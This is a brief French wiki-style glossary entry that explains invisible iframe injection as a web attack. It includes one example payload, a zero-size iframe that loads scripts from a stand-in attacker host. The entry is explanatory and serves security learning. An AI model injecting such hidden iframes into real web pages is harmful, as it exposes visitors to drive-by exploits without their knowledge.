Iframe
Aller à la navigation
Aller à la recherche
| Fiche express | |
|---|---|
| Domaine | Attaque web |
| Technique | Injection d'iframe invisible |
| Voir aussi | Modification d'URL · Subterfuge |
L'attaque par iframe consiste à insérer dans une page une <iframe> (souvent de taille nulle, donc invisible) pointant vers un contenu malveillant, afin de charger à l'insu de la victime un exploit ou une page pirate.
<iframe width="0" height="0" src="attaquant.example/js_attaque/"></iframe>
Voir aussi
- Modification d'URL — injection dans les paramètres d'URL
- Subterfuge — injection de code via MITM